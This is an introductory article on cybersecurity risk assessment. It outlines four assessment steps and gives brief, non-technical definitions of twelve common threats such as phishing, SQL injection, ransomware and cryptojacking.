Completing a risk assessment will allow an organization to allocate resources (time, money, and human capital) to reduce overall risk in an intelligent and strategic way. Cybersecurity defenses and controls should never be deployed arbitrarily; they should be deployed with the intention to reduce risk. Below are the basic steps taken to complete a risk assessment.
Sequential Steps Involved in Conducting a Risk Assessment
1. Identification: Determine all critical assets of the technology infrastructure. Next – diagnose sensitive data that is created, stored, or transmitted by these assets. Create a risk profile for each.
2. Assessment: Administer an approach to assess the identified security risks for critical assets. After careful evaluation and assessment, determine how to effectively and efficiently allocate time and resources towards risk mitigation. The assessment approach or methodology must analyze the correlation between assets, threats, vulnerabilities, and mitigating controls.
3. Mitigation: Define a mitigation approach and enforce security controls for each risk.
4. Prevention: Implement tools and processes to minimize threats and vulnerabilities from occurring in your firm’s resources.
Different Types of Risk Events
1. Malware: Malware is when an unwanted piece of programming or software installs itself on a target system, causing unusual behavior. This ranges from denying access to programs, deleting files, stealing information, and spreading itself to other systems.
2. Password Theft: “I’ve been hacked!” A common conclusion when you log in to an account, only to find your password changed and details lost. The reality is an unwanted third party managed to steal or guess your password and has since run amok with the information. It’s far worse for an enterprise, which may lose sensitive data.
3. Traffic Interception: Also known as “eavesdropping,” traffic interception occurs when a third-party “listens” to info sent between a user and host. The kind of information stolen varies based on traffic but is often used to take log-ins or valuable data.
4. Phishing Attacks: Typically, an end user receives a message or email which requests sensitive data, such as a password. Sometimes, the phishing message appears official, using legitimate appearing addresses and media. This compels an individual to click on links and accidentally give away sensitive information.
5. DDoS: Distributed Denial of Service is an attack method in which malicious parties target servers and overload them with user traffic. When a server cannot handle incoming requests, the website it hosts shuts down or slows to unusable performance.
6. Cross Site Attack: Referred to as an XSS attack. In this instance, a third party will target a vulnerable website, typically one lacking encryption. Once targeted the dangerous code loads onto the site. When a regular user accesses said website, that payload is delivered either to their system or browser, causing the unwanted behavior. The goal is to either disrupt standard services or steal user information.
7. Zero-Day Exploits: Occurring after the discovery of a “zero-day vulnerability,” an exploit is a targeted attack against a system, network, or software. This attack takes advantage of an overlooked security problem, looking to cause unusual behavior, damage data, and steal information.
8. SQL Injection: An SQL attack is essentially data manipulation, implemented to access information that isn’t meant to be available. Essentially, malicious third parties manipulate SQL “queries” (the typical string of code requests sent to a service or server) to retrieve sensitive info.
9. Social Engineering: Similar to phishing, social engineering is the umbrella method for attempting to deceive users into giving away sensitive details. This can occur on any platform, and malicious parties will often go to great lengths to accomplish their goals, such as utilizing social media info.
10. MitM Attack: A Man-in-the-Middle attack occurs when a third-party hijacks a session between client and host. The hacker generally cloaks itself with a spoofed IP address, disconnects the client, and requests information from the client. For example, attempting to log in to a bank session would allow a MITM attack to hijack user info related to their bank account.
11. Ransomware: A nasty variant of malware, ransomware installs itself on a user system or network. Once installed, it prevents access to functionalities (in part or whole) until a “ransom” is paid to third parties.
12. Cryptojacking: Cryptojacking is an attempt to install malware that forces the infected system to perform “crypto-mining,” a popular form of gaining crypto-currency. This, like other viruses, can infect unprotected systems. It is deployed because the act of crypto-mining is hardware intensive.